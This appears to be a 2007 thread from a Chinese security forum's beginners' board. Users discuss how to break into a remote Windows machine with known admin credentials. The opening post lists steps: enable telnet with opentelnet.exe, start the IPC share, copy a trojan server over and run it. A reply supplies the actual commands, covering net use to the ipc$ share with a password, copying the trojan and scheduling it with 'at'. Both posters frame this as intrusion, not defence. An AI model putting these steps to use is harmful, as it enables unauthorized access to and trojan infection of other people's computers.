论坛: 菜鸟乐园 标题: 关于IPC的问题!! 复制本贴地址    
作者: ckfbernard [ckfbernard]    论坛用户   登录
关于IPC的问题!!


如果我知道对方的IP,管理员的用户名和密码
用下面的方法入侵不知道行不行,请指点:
1先用opentelnet.exe开端口,
2再telnet那个端口,
3再远程开他的ipc服务,
4再本地复制木马服务端过去,
5再远程打开,
6再本地客户端连接.

问题:
1按照个这个过程总有失败,不知道那些步骤有问题,请指点.
2如果对方没有开启ipc服务,如何在telnet成功后开启他的IPC服务使我可以连接?只是net share sharename=drive:path  就可以了吗?
3为什么我经常出现read NTLM failed!

请高手回答我的问题并给我的入侵过程一些好的建议,谢谢.

地主 发表时间: 07-06-24 21:20

回复: sinobill [sinobill]   论坛用户   登录
首先:如果能telnet上去 就得到了shell。不用开那ipc了。
其次,如果是用admin帐户连接ipc的话,有两条路可走:
1、 用opentelnet.exe开对方的 telnet的服务,其他文章提示说 开了就能连接。可我一天开了机子不下10个都没telnet 连接成功,无语。如果你能telnent 成功,那恭喜你,你有shell,就只要懂点cmd命令就能搞定那个机子了。
2、用admin帐户建立ipc连接,上传木马,把木马添加到 计划任务中,然后就抽个烟……接下来图形界面操作。具体步骤:
    net use \\IP\ipc$ password /user:userId
   
    net view \\IP
    copy 路径+木马 \\IP\共享目录名
  at \\IP time 路径+木马
这些都成功的话 就ok了
但是我在上传了木马,添加了计划任务后,到时间了就是连接不上。不知道是因为防火墙还是因为 杀毒软件 老是连接不上 郁闷啊 对此 我无语

  有兴趣与我交流的 给我发信息。关注此帖。

B1层 发表时间: 07-06-26 00:02

回复: langren425 [langren425]   论坛用户   登录
哥们怎么联系?QQ号是多少

B2层 发表时间: 07-06-28 21:00

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号